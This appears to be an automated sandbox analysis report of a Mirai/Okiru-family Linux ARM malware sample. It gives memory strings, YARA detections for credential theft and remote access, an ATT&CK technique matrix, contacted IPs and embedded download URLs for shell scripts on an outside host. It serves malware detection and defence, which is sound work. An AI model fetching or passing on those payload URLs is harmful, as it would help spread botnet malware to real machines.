            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: U/arm/10!/usr/bin/ri2.701/usr/bin/vmware-namespace-cmd`!/usr/bin/caspol1/usr/bin/pkmon/arm/10!/usr/bin/pbget0!/usr/bin/info1/usr/bin/transmission-gtk
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: P /usr/bin/qemu-mipselQp
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: U!/run/dbusbinfmt/arm/tmp1/var/run/sshd.pidrm/un/dbus0!/run/cupsKIF8evice-APW1/run/dmeventd-clientrun/cups0!/run/avahi-daemon!/var/run/udisks2arm/run1/usr/bin/xfce4-find-cursor0!/run/acpid.socket!/var/run/crond.pidm/run1/usr/bin/gtk-query-settings0!/run/vmware1/usr/bin/whoopsie-preferencese0!/run/utmp1/run/initctlU/arm/run/utmp0!/run/user1/var/run/mono-xsp4.pidn/mount0!/run/sudo1/run/mount
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: U/arm/usr/bin/qemu-mipsn32
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: U!/etc/qemu-binfmt/arm
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: /usr/bin/qemu-mipsn32
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: /usr/bin/qemu-ppc64le
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: /usr/bin/qemu-ppc
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: /usr/bin/vmware-toolbox-cmd
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: /usr/bin/qemu-hppa
            Source: arm5.nn-20241218-0633.elf, 6208.1.00007ffe1f4cf000.00007ffe1f4f0000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-arm/tmp/arm5.nn-20241218-0633.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/arm5.nn-20241218-0633.elf
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: /var/run/vmware
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: U/arm/sr10 /usr/bin/fonttosfnt1/usr/bin/x86_64-linux-gnu-readelf1/usr/bin/cccheckarm/sr10!/usr/bin/gawk0!/usr/bin/uncompress1/usr/bin/glxheadsrm/sr10!/usr/bin/scsi_ready!/usr/bin/qemu-mips641/usr/bin/sqlmetalrm/10!/usr/bin/vim0!/usr/bin/enchant-21/usr/bin/networkd-dispatcher
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: /usr/bin/vmware-xferlogs
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: /usr/bin/qemu-mips64
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: U/arm/usr/bin/qemu-nios2Q
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: U/arm/sr10 /usr/bin/oclock0!/usr/bin/uuidgen1/usr/bin/qemu-sparc64sr10!/usr/bin/pic0!/usr/bin/znew1/usr/bin/bzexe/arm/sr10!/usr/bin/strip0!/usr/bin/lspgpot1/usr/bin/update-manager10!/usr/bin/rview0!/usr/bin/more1/usr/bin/keep-one-running
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: P /usr/bin/qemu-nios2
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: /arm/usr/bin/qemu-mipsel
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: /arm/usr/bin/qemu-alpha
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: U/arm/dev/cdrom0 /dev/vmci1
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: !/usr/bin/qemu-hppa!/usr/bin/zjsdecode1/usr/bin/sg_test_rwbufr10!/usr/bin/xmodmap!/usr/bin/comm1/usr/bin/bzip2/arm/sr10!/usr/bin/pdftocairo!/usr/bin/mv1/usr/bin/sg_sat_identifybin/mv!/usr/bin/arecord1/usr/bin/vmstat/arm/sr10!/usr/bin/locale-check!/usr/bin/ilasm!/usr/bin/appstreamclisr!/usr/bin/isovfy/arm/usr!/usr/bin/unzipsfxrm/A
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm/var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-logind.service-llmWag
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: /usr/bin/vmware-checkvm
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmp, arm5.nn-20241218-0633.elf, 6208.1.00007ffe1f4cf000.00007ffe1f4f0000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: U/arm/sr10!/usr/bin/qemu-arm!/usr/bin/arch
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: !/usr/bin/peekfd0!/usr/bin/grog1/usr/bin/qemu-microblaze0!/usr/bin/sbverify!/usr/bin/getcifsacl!/usr/bin/wsdl/arm/usr1/usr/bin/debconfarm/10!/usr/bin/aa-exec1/usr/bin/xfce4-appfinder`!/usr/bin/foo2zjs-pstops1/usr/bin/zegrep/arm/sr10!/usr/bin/atrm0!/usr/bin/gprof1
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: U/arm/sr10 /usr/bin/dirmngr!/usr/bin/rlogin1/usr/bin/isodumparm/sr10!/usr/bin/qemu-mips!/usr/bin/lsusb1/usr/bin/laptop-detectr10!/usr/bin/xbiff0!/usr/bin/lzless1/usr/bin/al2U/arm/10!/usr/bin/ntfs-3g.probe!/usr/bin/xzdiff1/usr/bin/foo2hbpl2-wrapper
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: U/arm/usr/bin/vmwarectrl
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: /usr/bin/qemu-mipsel
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: /usr/bin/vmware-vgauth-smoketest
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: U/arm/sr10 /usr/bin/captoinfo!/usr/bin/sg_luns1/usr/bin/zenity/arm/sr10!/usr/bin/vmware-rpctool1/usr/bin/xfce4-display-settings1/usr/bin/xvidtunerm/sr10!/usr/bin/dbus-send!/usr/bin/hp-testpage1/usr/bin/nm
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: U/arm/sr10 /usr/bin/rygel0!/usr/bin/cli-al1/usr/bin/lz4U/arm/sr10!/usr/bin/hp-check1/usr/bin/qemu-aarch64_be1/usr/bin/gjsU/arm/sr10!/usr/bin/vdir0!/usr/bin/7zr1/usr/bin/pastebinit/usr/bin/ps0!/usr/bin/hcitool!/usr/bin/cloud-init1/usr/bin/du
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: P /usr/bin/qemu-alphaQ ;
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: /usr/bin/qemu-ppc64abi32
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: P /usr/bin/qemu-crisQP
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: U/arm/sr/bin/pr0 /usr/bin/dconf0!/usr/bin/qemu-m68k1/usr/bin/certmgrarm/10!/usr/bin/lxterm01/usr/bin/md5sum.textutils1/usr/bin/kerneloops-submit
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: /usr/bin/vmware-vgauth-cmd
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: !/usr/bin/ping60!/usr/bin/journalctl1/usr/bin/clear/arm/sr10!/usr/bin/qemu-s390x!/usr/bin/xbuild1/usr/bin/screendump/sr10!/usr/bin/dbus-monitor!/usr/bin/sg_verify1/usr/bin/sg_copy_results0!/usr/bin/parecord!/usr/bin/pdfimages1/usr/bin/byobu-select-session0!/usr/bin/pinky0!/usr/bin/sensors1/usr/bin/lua5.3/arm/10!/usr/bin/pygettext3!/usr/bin/rnano1/usr/bin/gnome-shell-extension-tool
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: !/usr/bin/zdump1/usr/bin/ps2pdfwrrm/sr10!/usr/bin/qemu-i386!/usr/bin/mutter1`
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: /arm/usr/bin/qemu-nios2
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: /usr/bin/vmware-vmblock-fuse
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: /usr/bin/qemu-x86_64
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: !/usr/bin/pidgin0!/usr/bin/bitmap1/usr/bin/qemu-ppc64abi32
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: /usr/bin/qemu-sparc
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: /arm/usr/bin/qemu-mipsn32
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: /usr/bin/qemu-riscv64
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: /usr/bin/qemu-armeb
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: /usr/bin/vmware-rpctool
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: /tmp/vmware-root_721-4290559889
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: !/usr/bin/fwupdtpmevlog!/usr/bin/hp-probe1/usr/bin/helpztagsm/sr10!/usr/bin/chgrp0!/usr/bin/apt-get1/usr/bin/gzip/arm/sr10!/usr/bin/xzmore0!/usr/bin/gucharmap1/usr/bin/jsonpatch-jsondiff0!/usr/bin/xrefresh!/usr/bin/xlsfonts1/usr/bin/qemu-sparc/sr10!/usr/bin/alsatplg!/usr/bin/python!/usr/bin/prezip/arm/usr!/usr/bin/pycleanarm/usr!/usr/bin/xkbwatchrm/A
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: /usr/bin/qemu-m68k
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: U/arm/dev/vmci0 /dev/zfs1A
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: /run/vmware
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: U/arm/usr/bin/qemu-alpha!E
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: U/arm/sr10!/usr/bin/qemu-aarch64!/usr/bin/dirname
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: /usr/bin/vmhgfs-fuse
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: !/usr/bin/trial30!/usr/bin/run-parts1/usr/bin/hipercdecodesr10!/usr/bin/strace0!/usr/bin/cli-csc1/usr/bin/hciconfigm/sr10!/usr/bin/fc-pattern!/usr/bin/sg_rep_zones1/usr/bin/zmore/arm/10!/usr/bin/fprintd-delete!/usr/bin/showrgb1/usr/bin/qemu-sparc32plus
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: !/proc/1629/exe0!/proc/896/exe1/tmp/vmware-root_721-42905598890!/usr/libexec/gsd-color!/proc/904/exe1/proc/2097/exe/arm/ro10!/proc/1627/exe0!/usr/bin/whoopsie1/proc/2208/exe/arm/sr10!/usr/libexec/gsd-wacom!/proc/910/exe1/usr/bin/nm-appletm/10!/proc/1623/exe0!/proc/912/exe1/usr/libexec/ibus-engine-simple
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: U/arm/sr10 /usr/bin/qemu-sh4!/usr/bin/lnstat1/usr/bin/ippfindarm/sr10!/usr/bin/pstree0!/usr/bin/xz1/usr/bin/x86_64-linux-gnu-size!/usr/bin/sudoreplay1/usr/bin/rsync/arm/sr10!/usr/bin/fprintd-verify!/usr/bin/isoinfo1/usr/bin/cpp-9/arm/sr10!/usr/bin/pftp0!/usr/bin/lpr1/usr/bin/x-www-browser10!/usr/bin/ppdmerge!/usr/bin/lzgrep1/usr/bin/cloud-idrm/sr10!/usr/bin/im-launch!/usr/bin/al1/usr/bin/xfce4-panel-profilesl1/usr/bin/loweb/arm/sr10!/usr/bin/gold0!/usr/bin/ruby2.71/usr/bin/xfce4-terminal10!/usr/bin/groff0!/usr/bin/uxterm1/usr/bin/apt-add-repository0!/usr/bin/unsquashfs!/usr/bin/atq1/usr/bin/lowntfs-3g/sr10!/usr/bin/expiry0!/usr/bin/hp-colorcal1
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: /dev/vmci
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: U/arm/usr/bin/qemu-mipsn32el
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: /usr/bin/vmwarectrlQ
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: U/arm/usr/bin/qemu-cris
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: P /usr/bin/qemu-mipsn32Q
            Source: arm5.nn-20241218-0633.elf, 6208.1.00007ffe1f4cf000.00007ffe1f4f0000.rw-.sdmpBinary or memory string: U/tmp/qemu-open.Lb1GCE
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: U/arm/sr/bin/lp0 /usr/bin/perlthanks!/usr/bin/gnome-software1/usr/bin/sfill/arm/sr10!/usr/bin/getopt0!/usr/bin/lsmod1/usr/bin/xkbvledsrm/sr10!/usr/bin/gresource!/usr/bin/apt-config1/usr/bin/byobu-launcher-install0!/usr/bin/bashbug!/usr/bin/qemu-xtensa1/usr/bin/unity-settings-daemon0!/usr/bin/sgp_dd0!/usr/bin/pedump1/usr/bin/xfce4-mime-settings0!/usr/bin/rvim0!/usr/bin/pkexec!/usr/bin/zipcloakrm/usr1/usr/bin/git-upload-pack
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: /usr/bin/qemu-i386
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: /usr/bin/qemu-or1k
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: /usr/bin/vmwarectrl
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: U1/usr/bin/foo2zjs-wrapper0!/usr/bin/preconv!/usr/bin/qemu-x86_64U1/usr/bin/mcsU/arm/sr10!/usr/bin/jsonschema!/usr/bin/ypdomainname1/usr/bin/debconf-show10!/usr/bin/atril0!/usr/bin/dpkg-split
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: !/usr/bin/bccmd01/usr/bin/vmware-toolbox-cmd`!/usr/bin/lavadecode1/usr/bin/purple-url-handler0!/usr/bin/padsp0!/usr/bin/rmid1/usr/bin/gnome-session-inhibit0!/usr/bin/btrfs-image!/usr/bin/git1/usr/bin/software-properties-gtk!/usr/bin/sg_read_buffer!/usr/bin/apturl1/usr/bin/unattended-upgrade
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: /usr/bin/vmware-namespace-cmd
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: 1/usr/bin/qemu-microblazeelz
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: !/usr/bin/lwp-mirror!/var/run/acpid.socket1/usr/bin/apport-unpackr10!/usr/bin/xmore0!/var/run/vmware1/usr/bin/dh_perl_openssl0!/usr/bin/fmt0!/var/run/utmp1/usr/bin/btattachrm/ar10!/usr/bin/lastlog!/var/run/user1/usr/bin/xfce4-settings-editor0!/usr/bin/printf0!/var/run/sudo1/usr/bin/lz4cat/arm/ar10!/usr/bin/lcf0!/var/run/spice-vdagentd!/usr/bin/chrt/arm/var1/usr/bin/iconv/arm/usr/bin/ul0!/usr/bin/tbl01/usr/bin/debconf-set-selections`!/var/run/screen!/usr/bin/erb2.7/arm/var1/usr/bin/xfce4-session-settings
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: P /usr/bin/qemu-sh4eb
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: /usr/bin/qemu-sparc64
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: U/arm/sr10 /usr/bin/zforce0!/usr/bin/dm-tool1/usr/bin/gsdj/arm/sr10!/usr/bin/ps2ps0!/usr/bin/python31/usr/bin/systemd-runsr10!/usr/bin/pa-info!/usr/bin/xeyes1/usr/bin/nroff/arm/sr10!/usr/bin/ristretto!/usr/bin/pdftohtml1/usr/bin/gst-inspect-1.00!/usr/bin/qemu-ppc64le!/usr/bin/trust1/usr/bin/unicode_stop10!/usr/bin/tty0!/usr/bin/paste1/usr/bin/desktop-file-edit
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: /usr/bin/qemu-xtensaeb
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: /arm/usr/bin/qemu-cris
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: !/proc/379/exe!/usr/bin/vmtoolsdrm/pro1/usr/bin/foo2ddst-wrapper0!/proc/419/exe!/proc/721/exe/arm/pro1/usr/bin/session-migration0!/proc/420/exe1/proc/2078/exe/arm/ro10!/proc/1872/exe0!/proc/491/exe
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: /usr/bin/qemu-xtensa
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: P /usr/bin/qemu-mipsn32elQ
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: /arm/usr/bin/qemu-mipsn32el
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: /arm/dev/vmci
            Source: arm5.nn-20241218-0633.elf, 6208.1.00007ffe1f4cf000.00007ffe1f4f0000.rw-.sdmpBinary or memory string: /tmp/qemu-open.Lb1GCE
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: U/arm/sr10!/usr/bin/xfrun40!/usr/bin/ciptool1/usr/bin/linkiccarm/usr/bin/hd0!/usr/bin/c_rehash!/usr/bin/qemu-tilegx1/usr/bin/gnome-keyring-daemon
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: /arm/usr/bin/vmwarectrl
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: /usr/bin/qemu-mips
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: 1/usr/bin/vmware-vgauth-smoketest
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: U/arm/sr10 /usr/bin/debconf-escape!/usr/bin/gsbj1/usr/bin/growpartrm/sr10!/usr/bin/gdb-add-index!/usr/bin/setarch1/usr/bin/ubuntu-bug/sr10!/usr/bin/qemu-armeb!/usr/bin/libreoffice1/usr/bin/pidof/arm/10!/usr/bin/podselect!/usr/bin/lzegrep1/usr/bin/x86_64-linux-gnu-elfedit
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: /usr/bin/qemu-tilegx
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: U/arm/usr/bin/qemu-mipselz
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: U/arm/sr10 /usr/bin/pdftoppm!/usr/bin/ssh-argv01/usr/bin/timedatectlsr10!/usr/bin/rrsync0!/usr/bin/lspci1/usr/bin/upower/arm/sr10!/usr/bin/gpu-manager!/usr/bin/unpack2001/usr/bin/unity-scope-loader0!/usr/bin/size0!/usr/bin/qemu-riscv641/usr/bin/shares-admin10!/usr/bin/run-this-one!/usr/bin/diff31/usr/bin/gnome-shell-perf-tool
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: /usr/bin/qemu-aarch64_be
            Source: arm5.nn-20241218-0633.elf, 6208.1.000055c5e5cb4000.000055c5e5e28000.rw-.sdmpBinary or memory string: /usr/bin/qemu-mipsn32el

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: arm5.nn-20241218-0633.elf, type: SAMPLE
            Source: Yara matchFile source: 6208.1.00007fe574017000.00007fe574031000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: arm5.nn-20241218-0633.elf, type: SAMPLE
            Source: Yara matchFile source: 6208.1.00007fe574017000.00007fe574031000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: arm5.nn-20241218-0633.elf PID: 6208, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: arm5.nn-20241218-0633.elf, type: SAMPLE
            Source: Yara matchFile source: 6208.1.00007fe574017000.00007fe574031000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: arm5.nn-20241218-0633.elf, type: SAMPLE
            Source: Yara matchFile source: 6208.1.00007fe574017000.00007fe574031000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: arm5.nn-20241218-0633.elf PID: 6208, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information1
            Scripting
            Valid AccountsWindows Management Instrumentation1
            Scripting
            Path Interception11
            File Deletion
            1
            OS Credential Dumping
            11
            Security Software Discovery
            Remote ServicesData from Local System1
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
            Non-Standard Port
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
            Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            No configs have been found
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Number of created Files
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1577153 Sample: arm5.nn-20241218-0633.elf Startdate: 18/12/2024 Architecture: LINUX Score: 76 25 95.131.78.148, 23, 42206 ZOLOTAYALINIA-ASRU Russian Federation 2->25 27 156.226.203.160, 23, 59880 XIAOZHIYUN1-AS-APICIDCNETWORKUS Seychelles 2->27 29 98 other IPs or domains 2->29 31 Antivirus / Scanner detection for submitted sample 2->31 33 Multi AV Scanner detection for submitted file 2->33 35 Yara detected Okiru 2->35 37 Yara detected Mirai 2->37 8 dash rm arm5.nn-20241218-0633.elf 2->8         started        11 gnome-session-binary sh gsd-housekeeping 2->11         started        13 udisksd dumpe2fs 2->13         started        15 5 other processes 2->15 signatures3 process4 signatures5 39 Sample deletes itself 8->39 17 arm5.nn-20241218-0633.elf 8->17         started        process6 process7 19 arm5.nn-20241218-0633.elf 17->19         started        21 arm5.nn-20241218-0633.elf 17->21         started        23 arm5.nn-20241218-0633.elf 17->23         started       
            SourceDetectionScannerLabelLink
            arm5.nn-20241218-0633.elf37%VirustotalBrowse
            arm5.nn-20241218-0633.elf47%ReversingLabsLinux.Backdoor.Mirai
            arm5.nn-20241218-0633.elf100%AviraEXP/ELF.Mirai.W
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            No contacted domains info
            NameSourceMaliciousAntivirus DetectionReputation
            http://94.156.227.233/curl.sharm5.nn-20241218-0633.elffalse
              high
              http://94.156.227.233/lol.sharm5.nn-20241218-0633.elffalse
                high
                http://94.156.227.233/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/sarm5.nn-20241218-0633.elffalse
                  high
                  http://94.156.227.233/arm5.nn-20241218-0633.elffalse
                    high
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
                    IPDomainCountryFlagASNASN NameMalicious
                    15.157.206.185
